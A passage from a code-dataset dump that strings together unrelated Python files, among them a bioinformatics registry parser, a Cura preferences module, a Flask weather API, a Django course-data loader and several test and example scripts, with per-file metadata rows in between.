"Rights",
"pattern", # "ID regex",
"example", # "ExampleID",
"uri_format", # "Provider HTML URL",
"",
"MIRIAM checked",
"MIRIAM curator notes",
"MIRIAM coverage",
"updates",
"year last accessible",
"wayback url",
"last updated",
"last updated by",
"last updated by (orcid)",
]
KEEP = {
"prefix",
"bioportal",
"miriam",
"name",
"description",
"pubmed_ids",
"keywords",
"homepage",
"pattern",
"example",
"uri_format",
}
def get_prefixcommons(force_download: bool = False):
"""Get the Life Science Registry."""
if PROCESSED_PATH.exists() and not force_download:
with PROCESSED_PATH.open() as file:
return json.load(file)
download(url=URL, path=RAW_PATH, force=True)
rows = {}
with RAW_PATH.open() as file:
lines = iter(file)
next(lines) # throw away header
for line in lines:
prefix, data = _process_row(line)
if prefix and data:
rows[prefix] = data
PROCESSED_PATH.write_text(json.dumps(rows, sort_keys=True, indent=2))
return rows
def _process_row(line: str):
cells = line.strip().split("\t")
cells_processed = [None if cell in {"N/A"} else cell for cell in cells]
rv: Dict[str, Any] = {
key: value.strip()
for key, value in zip(COLUMNS, cells_processed)
if key and value and key in KEEP
}
for key in ["name", "description", "example", "pattern"]:
if not rv.get(key):
return None, None
for key in ["keywords", "pubmed_ids"]:
values = rv.get(key)
if values:
rv[key] = [value.strip() for value in values.split(",")]
uri_format = rv.get("uri_format")
if uri_format:
rv["uri_format"] = uri_format.replace("$id", "$1")
pattern = rv.get("pattern")
if pattern:
if not pattern.startswith("^"):
pattern = f"^{pattern}"
if not pattern.endswith("$"):
pattern = f"{pattern}$"
rv["pattern"] = pattern
return cells[0], rv
if __name__ == "__main__":
print(len(get_prefixcommons(force_download=True))) # noqa:T201
| 1.804688
| 2
|
tcapy_examples/gen/mongo_aws_examples.py
|
Ahrvo-Trading-Systems/tcapy
| 189
|
12775616
|
<reponame>Ahrvo-Trading-Systems/tcapy
"""This shows how we can connect to an instance of MongoDB Atlas to read/write market tick data
Note, that you will need to get a MongoDB Atlas cloud account, and change the connection string below for it to work
"""
__author__ = 'saeedamen' # <NAME> / <EMAIL>
#
# Copyright 2020 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import datetime
import time
from tcapy.util.loggermanager import LoggerManager
from tcapy.conf.constants import Constants
from tcapy.data.datafactory import MarketRequest
from tcapy.data.databasesource import DatabaseSourceArctic
from tcapy.util.mediator import Mediator
from tcapy.util.customexceptions import *
from test.config import *
logger = LoggerManager().getLogger(__name__)
constants = Constants()
logger.info('Make sure you have created folder ' + constants.csv_folder + ' & ' + constants.temp_data_folder +
' otherwise tests will fail')
Mediator.get_volatile_cache().clear_cache()
########################################################################################################################
# YOU MAY NEED TO CHANGE THESE
start_date = '26 Apr 2017'
finish_date = '05 Jun 2017'
ticker = 'EURUSD'
# Market data parameters for tables/databases
test_harness_arctic_market_data_table = 'market_data_table_test_harness'
test_harness_arctic_market_data_store = 'arctic-testharness'
csv_market_data_store = resource('small_test_market_df.parquet')
csv_reverse_market_data_store = resource('small_test_market_df_reverse.parquet')
# Note, you'll need to get your own connection string!
# You can setup your own MongoDB instance on the cloud using MongoDB Atlas https://www.mongodb.com/cloud/atlas
# It will give you the connection string to use
arctic_connection_string = "mongodb+srv://<username>:<password>@cluster0.blah-blah.mongodb.net/?retryWrites=true&w=majority"
def write_mongo_db_atlas_arctic():
"""Tests we can write market data to Arctic/MongoDB on Atlas (cloud)
"""
market_loader = Mediator.get_tca_market_trade_loader(version=tcapy_version)
### Test we can read data from CSV and dump to Arctic (and when read back it matches CSV)
db_start_date = '01 Jan 2016';
db_finish_date = pd.Timestamp(datetime.datetime.utcnow())
database_source = DatabaseSourceArctic(postfix='testharness', arctic_lib_type='CHUNK_STORE', connection_string=arctic_connection_string)
# Write CSV to Arctic
database_source.convert_csv_to_table(csv_market_data_store, ticker,
test_harness_arctic_market_data_table,
if_exists_table='replace', if_exists_ticker='replace', market_trade_data='market',
remove_duplicates=False)
# Read back data from Arctic and compare with CSV
market_request = MarketRequest(start_date=db_start_date, finish_date=db_finish_date, ticker=ticker,
data_store=database_source, # test_harness_arctic_market_data_store,
market_data_database_table=test_harness_arctic_market_data_table)
market_df_load = market_loader.get_market_data(market_request=market_request)
print(market_df_load)
if __name__ == '__main__':
start = time.time()
write_mongo_db_atlas_arctic()
finish = time.time()
print('Status: calculated ' + str(round(finish - start, 3)) + "s")
| 1.984375
| 2
|
Cura/Uranium/UM/Preferences.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
| 0
|
12775617
|
<filename>Cura/Uranium/UM/Preferences.py
# Copyright (c) 2018 <NAME>.
# Uranium is released under the terms of the LGPLv3 or higher.
import configparser
from typing import Any, Dict, IO, Optional, Tuple, Union
from UM.Logger import Logger
from UM.MimeTypeDatabase import MimeTypeDatabase, MimeType #To register the MIME type of the preference file.
from UM.SaveFile import SaveFile
from UM.Signal import Signal, signalemitter
MimeTypeDatabase.addMimeType(
MimeType(
name = "application/x-uranium-preferences",
comment = "Uranium Preferences File",
suffixes = ["cfg"],
preferred_suffix = "cfg"
)
)
## Preferences are application based settings that are saved for future use.
# Typical preferences would be window size, standard machine, etc.
# The application preferences can be gotten from the getPreferences() function in Application
@signalemitter
class Preferences:
Version = 6
def __init__(self) -> None:
super().__init__()
self._parser = None # type: Optional[configparser.ConfigParser]
self._preferences = {} # type: Dict[str, Dict[str, _Preference]]
## Add a new preference to the list. If the preference was already added, it's default is set to whatever is provided
def addPreference(self, key: str, default_value: Any) -> None:
if key.count("/") != 1:
raise Exception("Preferences must be in the [CATEGORY]/[KEY] format")
preference = self._findPreference(key)
if preference:
self.setDefault(key, default_value)
return
group, key = self._splitKey(key)
if group not in self._preferences:
self._preferences[group] = {}
self._preferences[group][key] = _Preference(key, default_value)
def removePreference(self, key: str) -> None:
preference = self._findPreference(key)
if preference is None:
Logger.log("i", "Preferences '%s' doesn't exist, nothing to remove.", key)
return
group, key = self._splitKey(key)
del self._preferences[group][key]
Logger.log("i", "Preferences '%s' removed.", key)
## Changes the default value of a preference.
#
# If the preference is currently set to the old default, the value of the
# preference will be set to the new default.
#
# \param key The key of the preference to set the default of.
# \param default_value The new default value of the preference.
def setDefault(self, key: str, default_value: Any) -> None:
preference = self._findPreference(key)
if not preference: # Key not found.
Logger.log("w", "Tried to set the default value of non-existing setting %s.", key)
return
if preference.getValue() == preference.getDefault():
self.setValue(key, default_value)
preference.setDefault(default_value)
def setValue(self, key: str, value: Any) -> None:
preference = self._findPreference(key)
if preference:
if preference.getValue() != value:
preference.setValue(value)
self.preferenceChanged.emit(key)
else:
Logger.log("w", "Tried to set the value of non-existing setting %s.", key)
def getValue(self, key: str) -> Any:
preference = self._findPreference(key)
if preference:
value = preference.getValue()
if value == "True":
value = True
elif value == "False":
value = False
return value
Logger.log("w", "Tried to get the value of non-existing setting %s.", key)
return None
def resetPreference(self, key: str) -> None:
preference = self._findPreference(key)
if preference:
if preference.getValue() != preference.getDefault():
preference.setValue(preference.getDefault())
self.preferenceChanged.emit(key)
else:
Logger.log("w", "Tried to reset unknown setting %s", key)
def readFromFile(self, file: Union[str, IO[str]]) -> None:
self._loadFile(file)
self.__initializeSettings()
def __initializeSettings(self) -> None:
if self._parser is None:
Logger.log("w", "Read the preferences file before initializing settings!")
return
for group, group_entries in self._parser.items():
if group == "DEFAULT":
continue
if group not in self._preferences:
self._preferences[group] = {}
for key, value in group_entries.items():
if key not in self._preferences[group]:
self._preferences[group][key] = _Preference(key)
self._preferences[group][key].setValue(value)
self.preferenceChanged.emit("{0}/{1}".format(group, key))
def writeToFile(self, file: Union[str, IO[str]]) -> None:
parser = configparser.ConfigParser(interpolation = None) #pylint: disable=bad-whitespace
for group, group_entries in self._preferences.items():
parser[group] = {}
for key, pref in group_entries.items():
if pref.getValue() != pref.getDefault():
parser[group][key] = str(pref.getValue())
parser["general"]["version"] = str(Preferences.Version)
try:
if hasattr(file, "read"): # If it already is a stream like object, write right away
parser.write(file) #type: ignore #Can't convince MyPy that it really is an IO object now.
else:
with SaveFile(file, "wt") as save_file:
parser.write(save_file)
except Exception as e:
Logger.log("e", "Failed to write preferences to %s: %s", file, str(e))
preferenceChanged = Signal()
def _splitKey(self, key: str) -> Tuple[str, str]:
group = "general"
key = key
if "/" in key:
parts = key.split("/")
group = parts[0]
key = parts[1]
return group, key
def _findPreference(self, key: str) -> Optional[Any]:
group, key = self._splitKey(key)
if group in self._preferences:
if key in self._preferences[group]:
return self._preferences[group][key]
return None
def _loadFile(self, file: Union[str, IO[str]]) -> None:
try:
self._parser = configparser.ConfigParser(interpolation = None) #pylint: disable=bad-whitespace
if hasattr(file, "read"):
self._parser.read_file(file)
else:
self._parser.read(file, encoding = "utf-8")
if self._parser["general"]["version"] != str(Preferences.Version):
Logger.log("w", "Old config file found, ignoring")
self._parser = None
return
except Exception:
Logger.logException("e", "An exception occurred while trying to read preferences file")
self._parser = None
return
del self._parser["general"]["version"]
## Extract data from string and store it in the Configuration parser.
def deserialize(self, serialized: str) -> None:
updated_preferences = self.__updateSerialized(serialized)
self._parser = configparser.ConfigParser(interpolation = None)
try:
self._parser.read_string(updated_preferences)
except configparser.MissingSectionHeaderError:
Logger.log("w", "Could not deserialize preferences from loaded project")
self._parser = None
return
has_version = "general" in self._parser and "version" in self._parser["general"]
if has_version:
if self._parser["general"]["version"] != str(Preferences.Version):
Logger.log("w", "Could not deserialize preferences from loaded project")
self._parser = None
return
else:
return
self.__initializeSettings()
## Updates the given serialized data to the latest version.
def __updateSerialized(self, serialized: str) -> str:
configuration_type = "preferences"
try:
from UM.VersionUpgradeManager import VersionUpgradeManager
version = VersionUpgradeManager.getInstance().getFileVersion(configuration_type, serialized)
if version is not None:
result = VersionUpgradeManager.getInstance().updateFilesData(configuration_type, version, [serialized], [""])
if result is not None:
serialized = result.files_data[0]
except:
Logger.logException("d", "An exception occurred while trying to update the preferences.")
return serialized
class _Preference:
def __init__(self, name: str, default: Any = None, value: Any = None) -> None:
self._name = name
self._default = default
self._value = default if value is None else value
def getName(self) -> str:
return self._name
def getValue(self) -> Any:
return self._value
def getDefault(self) -> Any:
return self._default
def setDefault(self, default: Any) -> None:
self._default = default
def setValue(self, value: Any) -> None:
self._value = value
| 2.171875
| 2
|
classic/cem.py
|
podondra/roboschool-rl
| 2
|
12775618
|
<reponame>podondra/roboschool-rl
# inspired by
# http://rl-gym-doc.s3-website-us-west-2.amazonaws.com/mlss/lab1.html
import numpy
class LinearPolicy:
def __init__(self, theta, env):
obs_dim = env.observation_space.shape[0]
act_dim = env.action_space.n
self.W = theta[:obs_dim * act_dim].reshape(obs_dim, act_dim)
self.b = theta[obs_dim * act_dim:]
def act(self, observation):
y = numpy.dot(observation, self.W) + self.b
return y.argmax()
def run_episode(policy, env, n_timesteps, render=False):
total_reward = 0
S = env.reset()
for t in range(n_timesteps):
a = policy.act(S)
S, R, done, _ = env.step(a)
total_reward += R
if render:
env.render()
if done:
break
return total_reward
def noisy_evaluation(theta, env, n_timesteps):
policy = LinearPolicy(theta, env)
return run_episode(policy, env, n_timesteps)
def cross_entropy_method(
env, n_iteration, n_timesteps, batch_size=25, elite=0.2, render=True
):
theta_dim = (env.observation_space.shape[0] + 1) * env.action_space.n
theta_mean = numpy.zeros(theta_dim)
theta_std = numpy.ones(theta_dim)
n_elite = int(batch_size * elite)
for iteration in range(n_iteration):
# sample parameter vectors
thetas = numpy.random.normal(
loc=theta_mean,
scale=theta_std,
size=(batch_size, theta_dim)
)
rewards = numpy.zeros(batch_size)
for i, theta in enumerate(thetas):
rewards[i] = noisy_evaluation(theta, env, n_timesteps)
# get elite parameters
elite_idxs = numpy.argsort(rewards)[-n_elite:]
elite_thetas = thetas[elite_idxs]
theta_mean = elite_thetas.mean(axis=0)
theta_std = elite_thetas.std(axis=0)
print('iteration:{:9d} mean reward: {:f} max reward: {:f}'.format(
iteration, numpy.mean(rewards), numpy.max(rewards)
))
policy = LinearPolicy(theta_mean, env)
run_episode(policy, env, n_timesteps, render)
| 2.65625
| 3
|
dataset_learn_slim.py
|
zhongdixiu/tensorflow-learn
| 0
|
12775619
|
# coding=utf-8
"""以MNIST为例,使用slim.data
"""
import os
import tensorflow as tf
slim = tf.contrib.slim
def get_data(data_dir, num_samples, num_class, file_pattern='*.tfrecord'):
"""返回slim.data.Dataset
:param data_dir: tfrecord文件路径
:param num_samples: 样本数目
:param num_class: 类别数目
:param file_pattern: tfrecord文件格式
:return:
"""
file_pattern = os.path.join(data_dir, file_pattern)
keys_to_features = {
"image/encoded": tf.FixedLenFeature((), tf.string, default_value=""),
"image/format": tf.FixedLenFeature((), tf.string, default_value="raw"),
'image/height': tf.FixedLenFeature((), tf.int64, default_value=tf.zeros([], dtype=tf.int64)),
'image/width': tf.FixedLenFeature((), tf.int64, default_value=tf.zeros([], dtype=tf.int64)),
"image/class/label": tf.FixedLenFeature((), tf.int64, default_value=tf.zeros([], dtype=tf.int64))
}
items_to_handlers = {
"image": slim.tfexample_decoder.Image(channels=1),
"label": slim.tfexample_decoder.Tensor("image/class/label")
}
decoder = slim.tfexample_decoder.TFExampleDecoder(keys_to_features, items_to_handlers)
items_to_descriptions = {
"image": 'A color image of varying size',
"label": 'A single interger between 0 and ' + str(num_class - 1)
}
return slim.dataset.Dataset(
data_sources=file_pattern,
reader=tf.TFRecordReader,
decoder=decoder,
num_samples=num_samples,
items_to_descriptions=items_to_descriptions,
num_classes=num_class,
label_to_names=label_to_name
)
NUM_EPOCH = 2
BATCH_SIZE = 8
NUM_CLASS = 10
NUM_SAMPLE = 60000
label_to_name = {'0': 'one', '1': 'two', '3': 'three', '4': 'four', '5': 'five',
'6': 'six', '7': 'seven', '8': 'eight', '9': 'nine'}
data_dir = './'
dataset = get_data(data_dir, NUM_SAMPLE, NUM_CLASS, 'mnist_train.tfrecord')
data_provider = slim.dataset_data_provider.DatasetDataProvider(dataset)
[image, label] = data_provider.get(['image', 'label'])
# 组合数据
images, labels = tf.train.batch([image, label], batch_size=BATCH_SIZE)
labels = slim.one_hot_encoding(labels, NUM_CLASS)
| 2.6875
| 3
|
exercicios/05.py
|
paulo123araujo/minicurso-python
| 0
|
12775620
|
<gh_stars>0
def calcula_fatorial(n):
resultado = 1
for i in range(1, n+1):
resultado = resultado * i
return resultado
def imprime_numeros(n):
imprimir = ""
for i in range(n, 0, -1):
imprimir += "%d . " %(i)
return imprimir[:len(imprimir) - 3]
numero = int(input("Digite um numero: "))
print("Fatorial de: %d" %(numero))
imprime = imprime_numeros(numero)
fatorial = calcula_fatorial(numero)
print("%d! = %s = %d" %(numero, imprime, fatorial))
| 4.0625
| 4
|
distributions/management/commands/load_section_data.py
|
cvivesa/class_util
| 1
|
12775621
|
<reponame>cvivesa/class_util<gh_stars>1-10
from pathlib import Path
from csv import DictReader
from django.core.management import BaseCommand
from distributions.models import Term, Course, Section
ALREADY_LOADED_ERROR_MESSAGE = """
If you need to reload the section data from the CSV file,
first delete the db.sqlite3 file to destroy the database.
Then, run `python manage.py migrate` for a new empty
database with tables\n"""
INVALID_CSV_NAME_ERROR_MESSAGE = """
CSVs must be in the format [fall/spring]YYYY.csv
eg: fall 2018 would be fall2018.csv
non-fall/spring semesters are not supported at this time\n"""
class Command(BaseCommand):
help = "Loads data from distributions/data/*.csv into the Sections model"
def handle(self, *args, **options):
if Section.objects.exists():
print('Section data already loaded...exiting.')
print(ALREADY_LOADED_ERROR_MESSAGE)
return
duplicates = 0
print("Loading section data...\n")
for path in Path('distributions/data').iterdir():
path_str = str(path).lower()
if path_str[-4:] != '.csv':
continue
filename = path.parts[-1].split('.')[0]
semester = filename[:-4]
year = filename[-4:]
if semester not in ['fall', 'spring']:
print('invalid semester in csv: ' + path_str)
print(INVALID_CSV_NAME_ERROR_MESSAGE)
continue
if year.isdigit():
year = int(year)
else:
print('invalid year in csv: ' + path_str)
print(INVALID_CSV_NAME_ERROR_MESSAGE)
continue
term = Term()
term.semester = semester
term.year = year
term.save()
table = []
with open(path, encoding='utf-8-sig') as file:
for row in DictReader(file):
table.append(row)
for row in table:
section = Section()
section.term = term
section.course, created = Course.objects.get_or_create(
department = row['department'],
number = row['course_number_1'],
title = row['course_title'],
hours = row['credit_hours'])
section.CRN = row['course_ei']
section.instructor = row['faculty']
section.average_GPA = row['qca']
section.As = row['As']
section.Bs = row['Bs']
section.Cs = row['Cs']
section.Ds = row['Ds']
section.Fs = row['Fs']
section.withdrawals = row['Textbox10']
section.class_size = row['number']
section.save()
print('done')
| 2.65625
| 3
|
tests/test_format_fixer.py
|
Sung-Huan/ANNOgesic
| 26
|
12775622
|
#!/usr/bin/python
import os
import sys
import csv
import shutil
from io import StringIO
import unittest
sys.path.append(".")
from mock_helper import import_data
from annogesiclib.format_fixer import FormatFixer
class TestFormatFixer(unittest.TestCase):
def setUp(self):
self.fixer = FormatFixer()
self.example = Example()
self.ratt_out = self.example.ratt_out
self.rnaplex_out = self.example.rnaplex_out
self.emboss_out = self.example.emboss_out
self.test_folder = "test_folder"
if (not os.path.exists(self.test_folder)):
os.mkdir(self.test_folder)
self.ratt_file = os.path.join(self.test_folder, "ratt.gff")
with open(self.ratt_file, "w") as rh:
rh.write(self.example.ratt_gff)
self.rnaplex_file = os.path.join(self.test_folder, "rnaplex.txt")
with open(self.rnaplex_file, "w") as rh:
rh.write(self.example.rnaplex_file)
self.emboss_file = os.path.join(self.test_folder, "emboss.txt")
with open(self.emboss_file, "w") as rh:
rh.write(self.example.emboss_file)
def tearDown(self):
if os.path.exists(self.test_folder):
shutil.rmtree(self.test_folder)
def test_fix_ratt(self):
out = os.path.join(self.test_folder, "ratt.out")
self.fixer.fix_ratt(self.ratt_file, "Staphylococcus_aureus_HG003", out)
datas = import_data(out)
self.assertEqual(set(datas), set(self.ratt_out.split("\n")))
def test_fix_rnaplex(self):
out_file = os.path.join(self.test_folder, "rnaplex.out")
self.fixer.fix_rnaplex(self.rnaplex_file, out_file)
datas = import_data(out_file)
self.assertEqual(set(datas), set(self.rnaplex_out.split("\n")))
def test_fix_emboss(self):
out_file = os.path.join(self.test_folder, "emboss.out")
self.fixer.fix_emboss(self.emboss_file, out_file)
datas = import_data(out_file)
self.assertEqual(set(datas), set(self.emboss_out.split("\n")))
class Example(object):
ratt_gff = """##gff-version 3
chromosome.Staphylococcus_aureus_HG003.final Refseq source 1 2821337 . + . mol_type=genomic DNA;db_xref=taxon:93061;strain=NCTC 8325;organism=Staphylococcus aureus subsp. aureus NCTC 8325;sub_species=aureus
chromosome.Staphylococcus_aureus_HG003.final Refseq gene 517 1878 . + . gene=dnaA;db_xref=GeneID:3919798;locus_tag=SAOUHSC_00001
chromosome.Staphylococcus_aureus_HG003.final Refseq CDS 517 1878 . + . gene=dnaA;db_xref=GI:88193824;db_xref=GeneID:3919798;transl_table=11;product=chromosomal replication initiation protein;note=binds to the dnaA-box as an ATP-bound complex at the origin of replication during the initiation of chromosomal replication, can also affect transcription of multiple genes including itself.;locus_tag=SAOUHSC_00001;protein_id=REF_uohsc:SAOUHSC00001;protein_id=YP_498609.1;codon_start=1
chromosome.Staphylococcus_aureus_HG003.final Refseq gene 2156 3289 . + . db_xref=GeneID:3919799;locus_tag=SAOUHSC_00002
chromosome.Staphylococcus_aureus_HG003.final Refseq tRNA 2156 3289 . + . EC_number=2.7.7.7;db_xref=GI:88193825;db_xref=GeneID:3919799;transl_table=11;product=DNA polymerase III subunit beta;note=binds the polymerase to DNA and acts as a sliding clamp;locus_tag=SAOUHSC_00002;protein_id=REF_uohsc:SAOUHSC00002;protein_id=YP_498610.1;codon_start=1"""
ratt_out = """##gff-version 3
Staphylococcus_aureus_HG003 Refseq source 1 2821337 . + . mol_type=genomic DNA;db_xref=taxon:93061;strain=NCTC 8325;organism=Staphylococcus aureus subsp. aureus NCTC 8325;sub_species=aureus
Staphylococcus_aureus_HG003 Refseq gene 517 1878 . + . ID=gene0;Name=dnaA;gene=dnaA;db_xref=GeneID:3919798;locus_tag=SAOUHSC_00001
Staphylococcus_aureus_HG003 Refseq CDS 517 1878 . + . ID=cds0;Name=YP_498609.1;Parent=gene0;gene=dnaA;db_xref=GI:88193824;db_xref=GeneID:3919798;transl_table=11;product=chromosomal replication initiation protein;note=binds to the dnaA-box as an ATP-bound complex at the origin of replication during the initiation of chromosomal replication, can also affect transcription of multiple genes including itself.;locus_tag=SAOUHSC_00001;protein_id=REF_uohsc:SAOUHSC00001;protein_id=YP_498609.1;codon_start=1
Staphylococcus_aureus_HG003 Refseq gene 2156 3289 . + . ID=gene1;Name=SAOUHSC_00002;db_xref=GeneID:3919799;locus_tag=SAOUHSC_00002
Staphylococcus_aureus_HG003 Refseq tRNA 2156 3289 . + . ID=rna0;Name=SAOUHSC_00002;EC_number=2.7.7.7;db_xref=GI:88193825;db_xref=GeneID:3919799;transl_table=11;product=DNA polymerase III subunit beta;note=binds the polymerase to DNA and acts as a sliding clamp;locus_tag=SAOUHSC_00002;protein_id=REF_uohsc:SAOUHSC00002;protein_id=YP_498610.1;codon_start=1"""
rnaplex_file = """>SAOUHSC_00001|dnaA
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)
>SAOUHSC_00001|dnaA
>srna352
((((((((&)))))))) 163,170 : 24,31 (-1.91 = -8.31 + 0.60 + 5.80)
>SAOUHSC_00001|dnaA
>srna559
(((((((((((((&)))))))))).))) 301,313 : 4,17 (-5.43 = -9.60 + 3.14 + 1.03)
Error during initialization of the duplex in duplexfold_XS
>SAOUHSC_00002
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)"""
rnaplex_out = """>SAOUHSC_00001|dnaA
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)
>SAOUHSC_00001|dnaA
>srna352
((((((((&)))))))) 163,170 : 24,31 (-1.91 = -8.31 + 0.60 + 5.80)
>SAOUHSC_00001|dnaA
>srna559
(((((((((((((&)))))))))).))) 301,313 : 4,17 (-5.43 = -9.60 + 3.14 + 1.03)
>SAOUHSC_00002
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)"""
emboss_file = """>A_1
DKSSNSFYKDLFIDFYIKILCITNKQDKVIHRLL
>B_1
NGIVPCLLSSPSILA*SALKRMSSLSLLVLLFAKAKX
>C_1
IELNHLSKQQKFGPTPYLSVVLFEESLLQYX"""
emboss_out = """>A
DKSSNSFYKDLFIDFYIKILCITNKQDKVIHRLL
>B
NGIVPCLLSSPSILA*SALKRMSSLSLLVLLFAKAKX
>C
IELNHLSKQQKFGPTPYLSVVLFEESLLQYX"""
if __name__ == "__main__":
unittest.main()
| 2.578125
| 3
|
tools/diagnostics/base_tech_bundle/kafka_bundle.py
|
snuyanzin/dcos-commons
| 0
|
12775623
|
<reponame>snuyanzin/dcos-commons
import json
import logging
import sdk_cmd
import config
from base_tech_bundle import BaseTechBundle
logger = logging.getLogger(__name__)
class KafkaBundle(BaseTechBundle):
def create(self):
logger.info("Creating Kafka bundle")
brokers = self.create_broker_list_file()
if brokers:
for broker_id in brokers:
self.create_broker_get_file(broker_id)
@config.retry
def create_broker_list_file(self):
rc, stdout, stderr = sdk_cmd.svc_cli(
self.package_name, self.service_name, "broker list", print_output=False
)
if rc != 0 or stderr:
logger.error(
"Could not perform broker list\nstdout: '%s'\nstderr: '%s'", stdout, stderr
)
else:
self.write_file("service_broker_list.json", stdout)
return json.loads(stdout)
@config.retry
def create_broker_get_file(self, broker_id):
rc, stdout, stderr = sdk_cmd.svc_cli(
self.package_name, self.service_name, "broker get %s" % broker_id, print_output=False
)
if rc != 0 or stderr:
logger.error(
"Could not perform broker get %s\nstdout: '%s'\nstderr: '%s'", broker_id, stdout, stderr
)
else:
self.write_file("service_broker_get_%s.json" % broker_id, stdout)
| 1.914063
| 2
|
app.py
|
mjraines/sqlalchemy-challenge
| 0
|
12775624
|
<reponame>mjraines/sqlalchemy-challenge
# Dependencies
import numpy as np
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
# Database Setup
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# Reflect an existing database into a new model
Base = automap_base()
# Reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
Station = Base.classes.station
Measurement = Base.classes.measurement
# Flask Setup
app = Flask(__name__)
# Flask Routes
@app.route("/")
def welcome():
# List all available api routes
return (
f"Welcome to the Hawaii Weather API!<br/><br/>"
f"Available Routes:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/><br/>"
f"Available Routes with Variable Input:<br/>"
f"/api/v1.0/2016-04-01<br/>"
f"/api/v1.0/2016-04-01/2017-04-01<br/><br/>"
f"NOTICE:<br/>"
f"Please input the query date in ISO date format(YYYY-MM-DD),<br/>"
f"and the start date should not be later than 2017-08-23."
)
@app.route("/api/v1.0/precipitation")
def precipitation():
# Create our session (link) from Python to the DB
session = Session(engine)
# Query precipitation measurements
result = session.query(Measurement.date, Measurement.prcp).all()
# Close Session
session.close()
# Create a list of dictionaries with all the precipitation measurements
all_prcp = []
for date, prcp in result:
prcp_dict = {}
prcp_dict[date] = prcp
all_prcp.append(prcp_dict)
return jsonify(all_prcp)
@app.route("/api/v1.0/stations")
def stations():
# Create our session (link) from Python to the DB
session = Session(engine)
# Find out all the stations
stations = session.query(Station.station).distinct().all()
# Close Session
session.close()
# Create a list of dictionaries with all the stations
station_list = []
for i in range(len(stations)):
station_dict = {}
name = f'Station {i + 1}'
station_dict[name] = stations[i]
station_list.append(station_dict)
return jsonify(station_list)
@app.route("/api/v1.0/tobs")
def tobs():
# Session (link) from Python to the DB
session = Session(engine)
# Find out the most recent date in the data set and convert it to date format
recent_date = session.query(Measurement).order_by(Measurement.date.desc()).first()
last_date = dt.datetime.strptime(recent_date.date, '%Y-%m-%d').date()
# Retrieve the last 12 months of temperature data
year_earlier = last_date - dt.timedelta(days=365)
# Set up the list for query and find out the most active station
active_station_list = [Measurement.station, func.count(Measurement.station)]
active_station = session.query(*active_station_list).group_by(Measurement.station).\
order_by(func.count(Measurement.station).desc()).first().station
# Pick out last 12 months of temperature measurements of the most active station throughout
active_station_temp = session.query(Measurement.date, Measurement.tobs).\
filter(func.strftime('%Y-%m-%d', Measurement.date) > year_earlier).\
filter(Measurement.station == active_station).all()
# Close Session
session.close()
# Create a list of dictionaries with the date and temperature with for loop
all_temp = []
for date, temp in active_station_temp:
temp_dict = {}
temp_dict['Date'] = date
temp_dict['Temperature'] = temp
all_temp.append(temp_dict)
return jsonify(all_temp)
@app.route("/api/v1.0/<start>")
def date_start(start):
# Create our session (link) from Python to the DB
session = Session(engine)
# Change the date in string format to datatime.date
year_earlier = dt.datetime.strptime(start, '%Y-%m-%d').date()
# Set up the list for query
temp_list = [func.min(Measurement.tobs),
func.max(Measurement.tobs),
func.avg(Measurement.tobs)]
# Filter out the measurements between the query date
date_temp = session.query(*temp_list).\
filter(func.strftime('%Y-%m-%d', Measurement.date) >= year_earlier).all()
# Close Session
session.close()
# Create a dictionary from the row data and append to a list of all_passengers
return (
f"Analysis of temperature from {start} to 2017-08-23 (the latest measurement in database):<br/>"
f"Minimum temperature: {round(date_temp[0][0], 1)} °F<br/>"
f"Maximum temperature: {round(date_temp[0][1], 1)} °F<br/>"
f"Average temperature: {round(date_temp[0][2], 1)} °F"
)
@app.route("/api/v1.0/<start>/<end>")
def date_start_end(start, end):
# Create our session (link) from Python to the DB
session = Session(engine)
# Change the date in string format to datatime.date
query_date_start = dt.datetime.strptime(start, '%Y-%m-%d').date()
query_date_end = dt.datetime.strptime(end, '%Y-%m-%d').date()
# Set up the list for query
temp_list = [func.min(Measurement.tobs),
func.max(Measurement.tobs),
func.avg(Measurement.tobs)]
# Pick out the measurements between the query date
date_temp = session.query(*temp_list).\
filter(func.strftime('%Y-%m-%d', Measurement.date) >= query_date_start).\
filter(func.strftime('%Y-%m-%d', Measurement.date) <= query_date_end).all()
# Close Session
session.close()
return (
f"Analysis of temperature from {start} to {end}:<br/>"
f"Minimum temperature: {round(date_temp[0][0], 1)} °F<br/>"
f"Maximum temperature: {round(date_temp[0][1], 1)} °F<br/>"
f"Average temperature: {round(date_temp[0][2], 1)} °F"
)
if __name__ == '__main__':
app.run(debug=True)
| 3.328125
| 3
|
authlib/django/client/__init__.py
|
bobh66/authlib
| 1
|
12775625
|
<gh_stars>1-10
# flake8: noqa
from authlib.deprecate import deprecate
from authlib.integrations.django_client import OAuth, DjangoRemoteApp as RemoteApp
deprecate('Deprecate "authlib.django.client", USE "authlib.integrations.django_client" instead.', '1.0', 'Jeclj', 'rn')
| 1.09375
| 1
|
crazyserv/packagegenerator.py
|
Roemer/CrazyServ
| 5
|
12775626
|
<filename>crazyserv/packagegenerator.py
import random
import numpy as np
from .arena import Arena
from .deliverylogger import DeliveryLogger
from .drone import Drone
class PackageGenerator:
def __init__(self):
self.coordinate_pool = self.define_coordinate_pool()
self.pool_size = self.coordinate_pool.shape[0]
self.package_weights = [0.5, 0.75, 1]
self.rng = {}
self.delivery_loggers = {}
def define_coordinate_pool(self):
arena = Arena(0)
z = arena.min_z
return np.array([
[2.6, 0.6, z],
[2.4, 3.4, z],
[0.6, 2.2, z],
[1.4, 3.2, z],
[1., 1.6, z],
[3.6, 0.6, z],
[3.2, 3.2, z],
[3.4, 1.4, z]
])
def initialize_swarm(self, swarm_id, seed):
self.rng[swarm_id] = random.Random()
self.rng[swarm_id].seed(seed)
self.delivery_loggers[swarm_id] = DeliveryLogger()
return True
def generate_number(self, swarm_id, lower_limit, upper_limit):
